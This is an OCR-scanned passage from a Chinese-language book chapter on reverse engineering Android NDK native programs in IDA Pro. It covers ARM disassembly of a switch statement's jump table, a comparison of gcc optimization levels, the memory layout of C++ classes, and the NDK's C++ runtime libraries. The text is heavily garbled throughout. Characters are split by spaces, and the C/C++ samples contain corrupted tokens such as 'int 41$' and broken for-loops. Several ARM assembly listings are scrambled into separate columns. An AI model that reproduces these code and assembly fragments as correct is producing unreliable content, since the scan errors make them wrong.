switch 分 支 多 用 在 分 支 判 断 较 多 且 条 件 单一 的 情况 下 ， 它 让 代码 更 加 简 
练 、 美 观 ， 它 的 反 汇 编 代 码 又 有 着 自己 的 独特 之 处 。 实 例 代码 如 下 : 
#include <stdio.h> 
int switchl(int a, int b, int i)í( 
switch (i)t 
case 1: 
return a + b; 
break; 
case 2: 
return a - b; 
break; 
case 3: 
return a * b; 
break; 
case 4: 


return a / b; 


break; 
default: 
return a + b; 
break; 
) 
) 
int main(int argc, int** argv[])( 


printf("switchl:$dWXn*'; switchl(3, 5, 3)); 


return 0; 


switch1 闵 数 传 入 三 个 参数 ， 根 据 第 三 个 参数 的 值 来 控制 前 两 个 参数 的 
运算 。 编 译 生 成 程序 后 将 其 拖 入 IDA Pro 中 ， 查 看 switch1 的 反 汇编 结 果 ， 流 
程 如 图 7-13 所 示 。 


图 7-13 ”使 用 IDA Pro 分 析 switch1 函 数 


switch 函数 流程 看 上 去 像 是 一 只 旋转 的 陀螺 ， 陛 螺 的 顶部 是 函数 的 初 
始 化 部 分 ， 底 部 是 函数 的 出 口 ， 每 个 分 支 最 终 殊途同归 。 每 个 分 支 体 的 最 
上 面 都 是 一 行 跳 转 指令 ， 它 被 称 为 switch 分 支 的 “ 跳 转 表 ”*， 我 们 通过 代码 来 
看 看 ， 它 是 如 何 协同 switch 语 句 工作 的 。 先 看 孙 数 的 初始 化 部 分 : 


1 STMFD SPI, [RILI,LR)] 

2 ADD R11, SP, #4 

3 SUB SP, SP, f$ 0x10 

4 STR RO, [R11,*tvar 8] 

5. STR Ri, [RLL | 

6 STR R2, [R11,stvar 10] 

7 LDR R3, [R11,s*stvar. 10] 

8 SUB R3, R3, 41 

9 CMP R3, 43 ; Switch 4 cases 
10 ADDLS PC, PC, R3,LSL82 ; switch jump 


第 1-3 行 代码 保存 现场 、 设 置 栈 帧 指针 、 开 辟 栈 空间 。 第 4-6 行 临时 保存 
函数 的 参数 ， 这 些 与 前 面 分 析 的 函数 都 类 似 。 第 7 行 取 第 三 个 参数 ， 即 
switch 分 支 要 判断 的 数据 ， 第 8 行将 值 减 去 1， 第 9 行将 值 与 3 比较 ， 另 外 代码 


注释 给 出 了 提示 ， 这 个 switch 有 4 个 分 支 (难道 IDA Pro 把 default 分 支 不 当 回 
事 了 ? ) 。 第 10 行 是 本 函数 的 关键 语句 ， 还 记得 for 循 环 实例 的 for2 函 数 吗 ? 
i an 访问 全 局 数组 时 用 到 了 LDR R2, [R2,R0,LSL#2] 这 条 指令 ， 这 
地 址 的 一 种 经 典 手法 ， 同 样 的 ，“ADDLS PC, PC, 
a E E ak R3 是 要 判断 的 变量 的 
值 ， 通 过 对 R3 的 左 移 两 位 ， 计 算出 跳 转 表 的 偏 移 量 ， 将 PC 加 上 这 个 偏 移 量 
就 直接 跳 转 到 跳 转 表 中 的 相应 条 目 ， 在 这 里 ，ADDLS 表 明了 只 有 第 9 行 代码 
比较 结果 小 于 等 于 3， 即 变量 n 小 于 等 于 4 时 PC 就 会 被 重新 赋值 ， 之 所 以 可 以 
这 样 设置 PC 的 值 ， 是 因为 这 条 指令 的 下 一 行 代 码 起 就 是 跳 转 表 ， 代 码 如 
下 : 


.text:0000831C ; -------------------------------2-----2-----2---- 
.text:0000831C 

.text:0000831C 1oc. 831C ; CODE XREF: switchl-«24/]j 
.text:0000831C B loc 832C ; jumptable 00008314 case 0 
.text:00008320 ; --------------------------------------------- 
.text:00008320 

.text:00008320 1oc 8320 ; CODE XREF: switchl-«24[]j 
.text:00008320 B loc. 833C ; jumptable 00008314 case 1 
.text:00008324 ; --------------------------------------------- 
.text:00008324 

.text:00008324 loc 8324 ; CODE XREF: Switch1+241 了 
.text:00008324 B loc 834C ; jumptable 00008314 case 2 
.text:00008328 ; --------------------------------------------- 
.text:00008328 

.text:00008328 loc 8328 ; CODE XREF: switch1-*24]]j 
.text:00008328 B loc, 835C ; jumptable 00008314 case 3 
.text:0000832C ; --------------------------------------------- 
.text:0000832C 


.text:0000832C loc. 832C ; CODE XREF: switchl1-24]]j 
.text:0000832C ; switchi: Loc 831Clj 
.text:0000832C LDR R2, [R11,svar 8] ; jumptable 00008314 case 0 
.text:00008330 LDR R3, [R11,*tvar C] 

.text:00008334 ADD R3, R2, RI 

.text:00008338 B loc. 837C 


技巧 


ADDLS 中 LS 为 指令 的 条 件 码 ， 表 示 代 码 执 行 条 件 为 标志 位 C=0,Z=1， 即 上 一 条 指令 运算 结果 小 
于 或 等 于 0 时 才 执行 加 法 操作 。 在 指令 中 使 用 各 种 条 件 码 比较 常见 ， 如 果 读 者 实在 记 不 住 ， 可 以 查看 
上 一 章 中 的 介绍 ， 或 者 翻 看 ARM 指 令 集 手册 。 


每 一 个 B 指 令 后 面 跟着 的 地 址 都 为 一 个 分 支 的 执行 体 ， 实 例 中 减法 的 分 


支 代码 为 : 
1 loc 833C ; jumptable 00008314 case 1 
2 LDR R2, [RII ; rar 8] 
3 LDR R3, [IRIL,KUVAY. UC] 
4 RSB R3, R3; R2 
5 B loc 837C 


第 2 行 取 第 1 个 参数 的 值 ， 第 3 行 取 第 2 个 参数 的 值 ， 第 4 行 执行 逆向 减法 
操作 ， 即 R3=R2-R3， 第 5 行 跳 转 到 函数 的 出 口 处 ， 对 于 每 个 分 支 而 言 ， 都 
有 这 条 跳 转 指令 。 


7.4.6 ”原生 程序 的 编译 时 优化 


原生 程序 的 优化 属于 gcc 编 译 器 控制 的 部 分 ， 未 经 过 优化 的 代码 与 经 过 
优化 的 代码 有 很 大 的 区 别 ， 在 实际 逆向 分 析 中 大 多 遇见 的 是 优化 过 的 代 
码 。gcc 编 译 优化 通过 -O (Foo) 选项 来 提供 ， 有 0、1、2、3、s 共 五 个 
优化 等 级 。 

等 级 0: 不 优化 。 在 makefile 文 件 中 未 指定 -0 选项 时 默认 为 不 优化 。 

等 级 1: 开启 部 分 优化 ， 该 模式 下 ， 编 译 会 尝试 减少 代码 体积 和 代码 运 
行 时 间 。 但 是 并 不 执行 会 花费 大 量 时 间 的 优化 操作 。 

等 级 2: 比 等 级 1 更 进一步 优化 ， 在 该 模式 下 ， 并 不 执行 循环 展开 和 子 
数 内 联 优 化 操作 ， 与 -O01 比较 该 模式 会 花费 更 多 的 编译 时 间 ， 并 生成 性 能 
好 的 代码 。 

等 级 3: 包括 等 级 2 所 有 的 优化 ， 并 开启 循环 展开 和 函数 内 联 优化 操 
作 。 


Fiks: 针对 程序 大 小 进行 优化 ， 该 模式 会 执行 -02 等 级 中 除了 会 增加 
程序 空间 的 所 有 优化 参数 ， 同 时 增加 了 一 些 优化 程序 空间 的 选项 。 
编译 器 优化 的 选项 非常 之 多 ， 我 们 不 去 深究 具体 每 个 等 级 的 优化 选 
项 ， 只 通过 使 用 不 同等 级 优化 来 比较 程序 的 大 小 及 代码 差异 。 
下 面 编写 一 段 代码 测试 gcc 优 化 选项 ， 完 整 代码 如 下 : 
4&include <stdio.h> 
inline int MAX(int a, int b)( // 内 联 函数 ， 求 最 大 数 
return (a» b) ? a: b; 
} 
inline int MIN(int a, int b)( // 内 联 函 数 ， 求 最 小 数 
return (a« b) ? a: b; 


} 
double add(int n)( // 耗 时 算法 
int 41$ 
int m; 
int x - 10000; 
int y - 20000; 
m - MAX(n, x); 
m - MIN(n, y); 
double s - 0.0; 
för (1 s Ub < m wg 2: S—.2L £244 * ER 
g += 2 * 0.0011 
} 
for (i = 0; i <m *m / 4; i += 100 - 9 * 11)í{ 
S += i / 12; 
) 
return S; 
) 


int main(int argc, int** argv[]){ // 程 序 从 这 里 开始 执行 
printf("value is:$1fWMn", add(15000)); 


return 0; 


采用 7.1.2 节 的 方法 来 编译 工程 。 采 用 makefile 手 动 方法 编译 需要 注意 一 
m: 代码 中 使 用 到 了 加 减 乘除 运算 操作 ， 程 序 在 链接 时 需要 加 入 libgcc.a 库 
文件 ， 而 如 果 采 用 ndk-build 方 式 编译 ，Android NDK 提 供 的 脚本 会 自动 完成 
相关 的 链接 操作 。 本 例 提供 的 makefile 工 程 编 译 了 0-s5 个 优化 等 级 的 程序 。 
如 果 采 用 Eclipse 来 编译 工程 ， 编 译 选项 就 有 一 些 特别 了 。 负 责 程 序 优化 的 
选项 为 APP_OPTIM， 需 要 在 Application.mk 文 件 中 指定 ， 并 且 赋 值 只 能 是 
debug 或 release 两 个 选项 之 一 。 它 在 Android NDK El 3€ BS build coreVadd- 
application.mk 文 件 中 定义 为 : 如 果 APP_OPTIM 指 定 为 debug， 那 么 程序 在 编 
译 时 会 加 入 -O00 选项 ， 即 对 代码 不 进行 优化 ， 反 之 ， 为 release 情 况 时 ， 会 加 
入 -02 选 项 对 代码 进行 2 级 优化 。 最 后 ， 在 definitions.mk 文 件 中 发 现 ， 
APP_OPTIM 选 项 被 定义 为 NDK_APP_VARS_OPTIONAL， 即 这 个 选项 是 可 
选 的 ， 因 此 ， 在 编写 Application.mk 文 件 时 不 定义 这 个 选项 ， 而 直接 传 入 
APP CFLAGS += -OX (“X” 为 优化 等 级 ) 选项 来 进行 代码 的 优化 。 编 译 生 
成 可 执行 程序 后 在 模拟 器 上 运行 测试 ， 执 行 的 效果 如 表 7-1 所 示 。 


表 7-1 gcc 编译 优化 等 级 对 比 测试 


优化 等 级 LFA (FH) 执行 时 间 
0 real 0m 33.42s /user 0m 32.71s 
l real 0m 28.21s /user 0m 27.39s 
2 real 0m 27.61s /user 0m 27.39s 
3 real 0m 27.79s /user — 0m 27.39s 


S real 0m 35.97s /user Om 34.76s 


技巧 


测试 程序 执行 时 间 可 以 在 模拟 器 或 手机 安装 busybox 工 具 ， 使 用 time 命 令 进行 测试 。 

Android 系 统 的 系统 内 核 采用 Linux， 本 身 自 带 的 许多 实用 小 工具 在 移植 时 都 被 去 除了 ，busybox 
for android 自 带 了 100 多 个 实用 命令 ， 有 了 它 ， 可 以 很 方便 地 在 adb shell 下 执行 Linux 常 用 命令 。 详 细 
的 安装 方法 读者 可 以 到 搜索 引擎 中 搜索 。 

本 例 中 测试 执行 时 间 使 用 以 下 命令 : adb shell time/data/local/arithmetic 


本 程序 中 2 级 优化 与 3 级 优化 的 效果 是 一 样 的 ， 且 执行 速度 是 最 快 的 。 
再 来 看 看 它们 代码 流程 分 别 如 图 7-14、 图 7-15、 图 7-16、 图 7-17 所 示 。 


CEEE 
_fFloatsidf 


. aeabi dadd 


图 7-14 ”未 经 过 优化 的 代码 


. floatsidf . muldf3 


. aeabi dadd 


id Y v * 
dword 83Ch5p|dword 83C8p |dvord 83CC|j ldword 83D8 


图 7-15 ”经 过 等 级 1 优化 过 的 代码 


. aeabi dadd 


图 7-16 ”经 过 等 级 2 与 等 级 3 优化 过 的 代码 


ka x 53 


Y v Yy 
dword_83D8 dword 83DC| |duord 83E8 
 Fleatsidr mara 


hà x4 53 


. aeabi dadd 


图 7-17 ”经 过 等 级 s 优 化 过 的 代码 


通过 IDA Pro 提 供 的 分 析 图 可 以 发 现 ， 代 码 在 未 经 过 优化 时 ， 会 保存 所 
有 的 变量 及 函数 调用 ， 等 级 1 优化 了 内 联 函 数 ， 等 级 2 与 等 级 3 之 间 的 差异 并 
不 是 很 大 ， 只 是 在 个 别 指令 调用 顺序 上 进行 了 调整 ， 等 级 s 在 本 例 中 无 论 是 
文件 大 小 还 是 执行 效率 都 是 表现 最 差 的 ， 另 外 ， 为 了 提高 程序 执行 效率 ， 
等 级 1 一 3 都 将 除法 指令 转换 成 了 相应 的 乘法 与 加 法 指令 ， 而 等 级 s 则 没有 。 


再 来 看 看 另 一 个 例子 ， 主 要 查看 代码 优化 前 后 寄存 器 使 用 的 变化 。 代 
码 选 择 了 7.3.4 节 的 while 实 例 ， 将 编译 器 的 优化 等 级 设计 为 02， 然 后 编译 程 
序 ， 将 生成 的 可 执行 文件 拖 入 IDA Pro 主 窗口 ， 最 后 得 到 dowhile 国 数 代码 如 
图 7-18 所 示 。 


; Segment type: Pure code 
AREA .text, CODE, RLIGN-h 
: ORG 80x82C8 

CODES2 


EXPORT dowhile 
douhile 

MOU R2, HU8 
MOU R3, 11 


> End of function dowhile 


图 7-18 ZAHER DEI BdowhileeKIZX 


对 比 图 7-11 与 图 7-18 可 以 发 现 ， 经 过 优化 的 代码 将 原先 基于 栈 变量 的 操 
作 全 部 转换 成 了 寄存 器 间 的 操作 ， 去 掉 了 对 栈 帧 寄存 器 R11 的 引用 ， 这 样 生 
成 的 代码 更 加 简练 ， 占 用 磁盘 空间 更 小 ， 而 且 运 行 速度 更 快 。 


7.5 ”原生 C++ 程 序 逆 同 分 析 


在 上 一 节 中 ， 笔 者 通过 不 同 的 实例 分 析 了 C 语 言 原生 程序 的 各 种 语句 结 
构 ， 并 探讨 了 分 析 它 们 的 方法 。 在 本 节 ， 我 们 将 一 如 既往 的 分 析 原 生 程 
序 ， 而 程序 的 开发 语言 则 从 C 升 级 成 为 Ct++。 本 节 主 要 从 C++ 的 类 、 成 员 变 
量 以 及 成 员 函 数 等 多 个 方面 进行 分 析 。 


7.5.1 “C++ 类 的 逆向 


C++ 语言 是 面向 对 象 的 开发 语言 ， 可 以 理解 为 C 语 言 的 一 个 扩展 。 就 语 
言 本 身 的 特性 而 言 ，C++ 是 一 门 比较 难 的 开发 语言 ， 开 发 人 员 掌 握 它 就 需要 
伦 上 不 少时 间 ， 因 此 逆向 C++ 程序 的 难度 自然 也 可 想 而 知 ， 没 有 较 深 入 的 
C++ 语言 知识 ， 很 难 在 C++ 代码 逆向 方面 有 大 的 突破 ， 本 小 节 介绍 的 实例 代 
码 也 只 是 简单 的 展示 一 下 C++ 语言 的 特性 所 呈现 出 的 反 汇 编 代 码 。 

逆向 C++ 代码 主要 是 逆向 C++ 的 类 ， 如 果 C++ 代 码 不 涉及 到 类 ， 也 只 能 
是 当 C 语 言 程序 来 看 待 了 。 下 面 是 本 小 节 的 实例 代码 。 


#include <stdio.h> 


class aclassí 
private: 

int m; 

char c; 


public: 


// aclass 类 
/ /两 个 私有 成 员 变 量 


aclass(int i, char ch) 


{ 


/1 构造 函数 


printf ("Constructor called.\n"); 


this->m 
this->c 
} 
~aclass() { 


= ch 


// 析 构 函 数 


printf ("Destructor called.n"); 


} 


int getM() const { 


return m; 


} 


void setM(int m) { 


this->m = m; 


} 
char getC() 


const( 


return c; 


) 


void setC(char c) ( 


this-»c = c; 


) 
int add(int 


printf("$dMn", 


lI 
int main(int argc, 


a, int b) 


( 
a+b); 


char* argv[])( 


aclass *a - new aclass(3, 


a-»setM(5); 
a-»setC('a'); 
a-»add(2, 8); 
printf("£dWMn", 
delete a; 


return 0; 


a-»getM()); 


Ses 


// 成 员 函 数 add () 


这 段 代 码 定 义 了 一 个 aclass 类 ， 该 类 有 2 个 私有 成 员 变 量 、1 个 构造 函 
数 、1 个 析 构 函数 ， 还 有 5 个 成 员 辆 数 。main0 国 数 第 一 行 代码 new 了 一 
aclass 对 象 指针 (这 里 之 所 以 没有 直接 声明 aclass 类 ， 是 因为 gcc 编 译 器 会 检 
测 到 代码 的 计算 结果 ， 将 类 的 调用 代码 优化 掉 ) ， 然 后 设置 了 aclass 的 两 个 
变量 的 值 ， 并 调用 了 add0 成 员 函 效 ， 接 着 使 用 printfO 输 出 了 成 员 变 量 mm 的 
值 ， 最 后 调用 delete 来 释放 a 指 针 。 没 有 学 过 C++ 的 朋友 看 到 这 段 代 码 时 除了 
对 “->” 符 号 不 太 理 解 外 〈 它 的 作用 是 访问 类 的 成 员 变 量 或 成 员 孙 数 ) ， 其 它 
的 代码 应 该 都 能 够 通过 自己 所 学 的 Java 知 识 来 融会 贯通 。 编 译 生 成 cpp2 后 拖 
放 到 IDA Pro 上 看 其 反 汇 编 代 码 。 


main 


STMFD SP!, (R4-R6,LR) 


MOV RO, #8 

BL  Znwj ; operator new(uint) 
MOV R4, RO @ 保 存 分 配 的 内 存 对 象 地 址 

LDR RO, -(aConstructorCal - 0x8620) 

LDR R5, -(aD - 0x862C) 

ADD RO, PC, RO ; "Constructor called." 
BL puts @ 输 出 构造 函数 被 调用 

MOV R3, #5 @m=5 

ADD Ro. PO RS 7 aN 

STR R3, [R4] @setM(5) 

MOV R3, #0x61 Q'a' 


STRB R3, [R4,44] GsetC('a') 
MOV R1, $0xAGadd(2, 8), bi Dy 


MOV RO, ‘RS ; format 

BL printf 

LDR R1, [R4] @R4 指 向 的 内 存 地 址 处 第 一 项 为 成 员 变 量 m 
MOV RO, R5 ; format 

BL printf 

LDR RO, -(aDestructorCall - 0x8658) 

ADD RO, PC, RO ; "Destructor called." 
BL puts @ 输 出 析 构 函数 被 调用 

MOV RO, R4 i volg. * 

BL J ZdlPv ; operator delete(void *) 
MOV RO, #0 

LDMFD  SP!, (R4-R6,PC) @ 程 序 返回 


IDA Pro 将 new 操 作 解 析 为 了 符号 _Znwj， 不 过 在 注释 中 了 指明 了 它 为 
new 操 作 符 。new 操 作 符 共 分 配 了 8 字 节 的 存储 空间 ，aclass 类 共有 两 个 成 员 
变量 ， 它 们 就 占用 了 8 个 存储 单元 ， 那 其 它 的 国 数 呢 ? 它们 没有 占用 存储 空 
间 吗 ?这 里 的 setMO 与 setCO 被 优化 成 了 直接 访问 R4 寄 存 器 所 指向 的 存储 单 
元 的 代码 ， 我 们 看 “STRB R3, [R4,#4]” 这 条 指令 ，R4 为 new 操 作 符 分 配 的 内 


存 ， 理 论 上 它 指向 aclass 类 的 首 地 址 ， 那 aclass 类 的 内 存 布 局 与 类 的 声明 有 什 
么 联系 ? 宏观 上 ， 我 们 可 以 将 C++ 的 类 理解 为 C 语 言 中 的 结构 体 ， 每 一 个 成 
员 变 量 就 是 一 个 结构 字段 ， 每 一 个 成 员 函 数 的 代码 都 被 优化 到 了 类 的 外 
部 ， 它 们 不 占据 存储 空间 。 回 头 看 “STRB R3, [R4,#4]” 就 很 容易 理解 了 ， 这 
是 在 访问 类 的 第 2 个 成 员 变 量 啊 ! 成 员 函 数 add0 也 被 优化 掉 了 ， 而 且 传 递 的 
两 个 参数 也 被 gcc 编 译 器 直接 算出 结果 了 。 最 后 ， 因 为 调用 delete 的 关系 ， 
GCC 编译 器 也 “规范 ”的 插入 了 析 构 函数 的 代码 。 


7.5.2 Android NDK 对 C++ 特性 的 支持 


C++ 的 一 些 常用 特性 包括 STL (Standard Template Library， 标 准 模 板 
Æ) 、C++ 异 常 、RTTI (Run-Time Type Identification ， 运 行 时 类 型 识别 ) 
等 。 早 先 版 本 的 Android NDK 对 它们 的 支持 有 些 问 题 ， 随 着 版 本 的 不 断 升 
级 ， 如 今 的 R8 版 本 对 它们 的 支持 已 经 很 好 了 。 

Android NDK R8 提 供 了 四 套 运 行 时 环境 来 支持 C++ 的 特性 。 它 们 分 别 
是 system、gabi++、stlport、gnustl。 它 们 对 C++ 的 特性 支持 如 表 7-2 所 示 。 


表 7-2 Android NDK 运 行 库 对 C++ 特 性 的 支持 


C++ Exceptions C++ RTTI Standard Library 


system 


gabi++ 


stlport 


gnustl 


要 想 启用 不 同 的 运行 库 ， 需 要 在 Application.mk 文 件 中 定义 APP_STL ， 
它 的 取 值 如 表 7-3 所 示 。 


表 7-3 APP_STL 的 取 值 及 含义 


er ba 

system 默认 使 用 系统 C++ 运行 库 
gabi++ static 使 用 Gabi++ 运 行 库 作为 静态 库 
gabi++ shared | 使 用 Gabi++ 运 行 库 作 为 动态 库 


H 
stlport static 使 用 STLport 运行 库 作为 静态 库 
stlport shared 使 用 STLport 运行 库 作为 动态 库 
} 
H 


gnustl static 使 用 GNU STL 作为 静态 库 
gnustl shared 使 用 GNU STL 作为 动态 库 


system 是 Android NDK 默 认 提 供 的 运行 库 ， 使 用 它 最 终生 成 的 程序 会 链 
接 libstdc++.so 库 文件 。system 作 为 最 基础 的 C++ 支持 库 ， 并 不 支持 额外 的 
C++ 特 性 ， 因 此 ， 它 通常 应 用 于 小 型 的 C++ 程 序 。 

比 起 system 的 “一 无 所 有 ”，gabi++ 提 供 了 RTTI 的 支持 ， 它 是 最 小 的 支持 
C++ 特 性 。Android NDK 是 从 R5 版 本 起 支持 RTTI 的 ， 默 认 gcc 的 命令 行 参 数 
中 “-fno-rtti” 会 禁止 RTTI 支 持 ， 要 想 使 用 gabit+ 启 用 RTTI， 除 了 需要 在 
Application.mk 文件 中 添加 “APP_STL := gabi++_static” 或 “APP_STL := 
gabi++_shared” , 还 需要 添加 “APP CPPFLAGS += -frtti”， 或 者 在 
Android.mk 文 件 中 添加 “LOCAL_CPP_FEATURES += rtti”。 

STLport 是 一 套 STL 库 ， 它 的 官网 为 http://wwwi.stlport.org，Android NDK 
中 提供 了 它 的 Android 移 植 版 ， 要 想 使 用 该 STL 库 ， 需 要 在 Application.mk 文 
件 中 设置 “APP_STL := stlport_static” 或 “APP_STL := stlport_shared”。 如 果 使 

用 静态 版 本 的 STLport， 代 码 中 使 用 的 所 有 C++ 特性 及 函数 都 会 静态 链接 到 
原生 程序 中 ， 这 样 生 成 的 程序 比较 大 ， 但 运行 效果 比较 稳定 ， 如 果 使 用 动 
态 版 本 的 STLport， 则 与 原生 程序 发 布 时 会 随同 附带 一 个 libstlport_shared.so 
文件 ， 这 样 生成 的 原生 程序 会 比较 小 。 另 外 ，Android bci qus 
行 参数 “-fno-exceptions” 会 禁止 C++ 异常 特性 ， 要 想 启 用 C++ 异常 特性 ， 

在 Application.mk 文 件 中 添加 “APP_ CPPFLAGS += -fexceptions" , "n 在 
Android.mk 文 件 中 添加 “LOCAL_CPP_FEATURES += exceptions"s 

GNU SIL 是 最 大 的 STL 库 ， 它 提供 了 完整 的 C++ 特 性 支持 。 要 想 使 用 该 
STL 库 ， 需 要 在 Application.mk 文 件 中 设置 “APP_STL := gnustl_static” 或 
“APP_STL := gnustl_shared”。 如 果 使 用 静态 版 本 的 GNU STL， 生 成 的 文件 


比 使 用 STLport 静 态 版 本 生成 的 程序 还 要 大 ， 使 用 动态 版 本 的 GNU STL 则 会 
在 原生 程序 发 布 时 随同 附带 一 个 libgnustl_shared.so 文 件 ， 它 的 大 小 是 
libstlport_shared.so 文 件 的 2 到 3 倍 。 同 样 ， 要 想 启 用 RTTI 或 异常 特性 支持 ， 
需要 按照 上 面 介绍 gabi++ 与 STLport 时 的 方法 来 开启 。 另 外 ，Android NDK 
为 该 库 还 提供 了 一 个 变量 APP_GNUSTL_FORCE_CPP_FEATURES， 可 以 指 
定 “APP_GNUSTL_FORCE_CPP_FEATURES := exceptions rtti” 来 同时 启用 
RTTI 与 异常 特性 支持 。 

以 上 4 套 运 行 库 的 源码 位 于 Android NDK 的 sources\cxx-stl 目 录 下 ， 读 者 
在 逆向 STL 代 码 时 可 以 对 照 源 码 来 进行 分 析 。 


7.5.3 “静态 链接 STL 与 动态 链接 STL 的 代码 区 别 


大 多 数 的 C++ 程序 都 会 使 用 STL 中 提供 的 函数 来 实现 软件 的 功能 ， 掌 握 
STL 函 数 的 逆向 方法 也 成 为 了 提高 Android NDK 程 序 逆 向 水 平 的 必 经 之 路 。 
在 上 一 小 节 中 ， 我 们 已 经 知道 Android NDK 中 提供 了 4 种 类 型 的 库 来 支持 
C++ 特 性 ， 其 中 STLport 与 GNU STL 提 供 了 STL 的 支持 ， 本 小 节 我 们 使 用 
GNU STL 来 编写 一 段 实例 代码 ， 实 例 中 的 类 仍然 选择 上 一 节 中 的 aclass， 我 
们 将 所 有 的 printf 输 出 全 部 换 成 std::cout 输 出 ， 并 增加 头 文件 声明 “#include 
<iostream>” 与 名 称 空 间 引 用 “using namespace std;”， 最 后 还 需要 在 
Application.mk 中 设置 APP_STL 的 值 ， 我 们 先 设置 它 的 值 为 gnustl_shared 来 
看 看 动态 链接 的 STL 反 汇编 代码 。 在 命令 提示 符 下 输入 ndk-build 编 译 工程 ， 
没有 错误 的 话 会 在 工程 的 libs\armeabi 目 录 下 生成 cpp2 与 libgnustl_shared.so 文 
件 ， 将 cpp2 拖 入 IDA Pro 主 窗口 中 ， 反 汇编 代码 如 下 。 


.text: 
.text: 
text: 
.text: 
.text: 
.text: 
.text: 
etext: 
tex 
text: 
stext: 
„text: 
text: 
.text: 
:0000873C 


.text 


.text: 
.text: 
:00008748 


text 


.text: 
.text: 
.text: 
text: 
text: 
text: 


O00 G s= aanren n ren cp rientro pneter rt ete 


0000870C main 
0000870C 
00008710 
00008714 
00008718 
0000871C 
00008720 
00008724 
00008728 
0000872C 
00008730 
00008734 
00008738 


00008740 
00008744 


0000874C 
00008750 
00008754 
00008758 
0000875C 
00008760 


STMFD 
MOV 
BL 
LDR 
LDR 
LDR 
ADD 
LDR 
MOV 


BEQ 
LDRB 
CMP 


; CODE XREF: .text:loc 86B4|j 
SP!, (RA-R10,LR) 


RO, £8 ; 8 字 节 为 aclass 类 的 大 小 

. Znwj ; operator new(uint) 

R4, -( GLOBAL OFFSET TABLE - 0x872C) 
R6, -0x40 

R1, -(aConstructorCal - 0x8740) 

RA, PC, R4 

R5, [R4,R6] 

R7, RO ; aclass *a 

R2, 80x13 ; 需要 输出 的 字符 个 数 

RO, R5 

R1, PC, RL ; "Constructor called." 


 ZSt16 .ostream insertIcStllchar 
traitsIcEERStl13 basic ostreamIT TO. 
ES6 PKS3 i ; cout 输 出 字符 串 

R3, [R5] 

R3, [R3,#-0xC] 

R3, R5, R3 

R8, [R3,s90x7C] 

R8, #0 ; 判断 返回 的 cout 对 象 是 否 为 空 
throw badcast 

R3, [R8,40x1C] 

R3, #0 


LDRNEB R1, [R8,$40x27] 


.text: 
.text: 
.text: 


. text: 
text 
stext: 
.text: 
.text: 
Jbext: 
-texts 
.text: 
.text:; 
text: 
.text: 
.text: 
„text: 
:0000879C 
.text: 
.text: 
text: 
.text: 
.text: 
.text: 
t eact ; 
ALext: 
.text: 
.text: 
.text: 
.text: 
.text: 
.text: 
:000087D8 


.text 


.text 


.text: 
JEe3xE: 
.text: 
.text: 
. text: 
.text: 


00008764 
00008768 
0000876C 


00008770 
00008774 
00008778 
0000877C 
00008780 
00008784 
00008788 
00008788 loc 8788 
00008788 
0000878C 
00008790 
00008794 
00008798 


000087A0 
000087A4 
000087A8 
000087AC 
000087B0 
000087B4 
000087B8 
000087BC 
000087C0 
000087C4 
000087C8 
000087CC 
000087D0 
000087D4 


000087DC 
000087E0 
000087EA4 
000087E8 
000087EC 
000087F0 


BNE 
MOV 
BL 


MOV 
MOV 
LDR 
MOV 
LDR 
MOV 


LDR 
MOV 
BL 
BL 
MOV 
STR 
MOV 
STRB 
MOV 
MOV 
BL 
MOV 
LDR 
BL 
LDR 
MOV 
LDR 
ADD 
LDR 
CMP 
BEQ 
LDRB 
CMP 
LDRNEB 
BNE 
MOV 
BL 


loc 8788 

RO, R8 
 ZNKSt5ctypeICE13 M widen initEv ; 
std::ctype«char»:: M widen init(void) 
R1, #0xA 

RO, R8 

R3, [R8] 

LR, PC 

PC, [R3,40x18] 

R1, RO 


; CODE XREF: .text:000087641j 
R8, [R4,R6] 
RO, R8 ; 以 下 两 行为 cout<<end1 
_ZNSo3putEc ; std::ostream::put(char) 
—ZNSo5flushEv ; std::ostream::flush(void) 
R3, #5 ES 


R3, [R7] ; a-»setM(5) 

R3, #0x61 z; ka? 

R3, [R7, #4] ; a-»setC('a') 

R1, #0xA ; a*bz10 

RO, R8 ; R8 为 返回 的 cout 对 象 
_ZNSolsEi ; cout<<a+b 

RO, R8 

R1, [R7] ; R7 为 aclass 类 的 首 地 址 
_ZNSolsEi ; cout««a-»getM() 
R3, [R0] 

R8, RO 

R3, [R3,4-0xC] 

R3, RO, R3 

R10, [R3,£$0x7C] 

R10, #0 


throw badcast 
R3, [R10,*50x1C] 


R3, #0 

R1, [R10,#0x27] 

loc. 880C ;下面 两 行为 cout<<end1 
RO, R10 


—ZNKSt5ctypeICE13 M widen initEv ; 
std::ctype«char»:: M widen init(void) 


.text: 
tet: 
.text: 
.text: 
.text: 
etext: 
.text: 
.text: 
;Ltext: 
«text: 
已 全 2 
.text: 
:0000881C 


.text 


.text: 
.text: 
:00008828 


.text 


.text: 


.text: 
text: 
.text: 
text: 
.text: 
text: 
text: 
text: 
.text: 
:00008854 


Cet 


.text: 
text: 
text: 
.text: 
.text: 
.text: 
.text: 


.text: 
.text: 
.text: 


000087F4 
000087F8 
000087FC 
00008800 
00008804 
00008808 
0000880C 
0000880C 1oc. 880C 
0000880C 
00008810 
00008814 
00008818 


00008820 
00008824 


0000882C 


00008830 
00008834 
00008838 
0000883C 
00008840 
00008844 
00008848 
0000884C 
00008850 


00008858 
00008858 loc. 8858 
00008858 
0000885C 
00008860 
00008864 
00008868 


0000886C 
00008870 
00008874 ; 


MOV 
MOV 
LDR 
MOV 
LDR 
MOV 


MOV 
BL 
BL 
LDR 
LDR 
MOV 
MOV 
ADD 
BL 


LDR 
LDR 
ADD 
LDR 
CMP 
BEQ 
LDRB 
CMP 
LDRNEB 
BEQ 


LDR 
BL 
BL 
MOV 
BL 


MOV 
LDMFD 


R1, #0xA 


RO, R10 
R3, [R10] 
LR, PC 
PC, [R3,40x18] 
R1, RO 

; CODE XREF: .text:000087E81 j 
RO, R8 ; 下 面 两 行为 cout<<end1 
 ZNSo3putEc ; Std::ostream::put(char) 
 ZNSo5flushEv ; std::ostream::flush(void) 
R8, [RA4,R6] 
R1, -(aDestructorCall - 0x8830) 
R2, 40x12 ; 需要 输出 的 字符 个 数 
RO, R8 
Rl, BC, Ri ; "Destructor called." 


.ZStl6  ostream insertIcStllchar 
traitsICEERSt13 basic ostreamIT 
TO ES6 PKS3 i ; 
R3, [R8] 

R3, [R3,4-0xC] 
R5, R5, R3 

R5, [R5,40x7C] 
R5, #0 

throw badcast 
R3, [R5,$0x1C] 
R3, #0 

R1, [R5,4$0x27] 
loc, 8874 


cout 


; CODE XREF: .text:00008894|j 

RO, [R4,R6] 

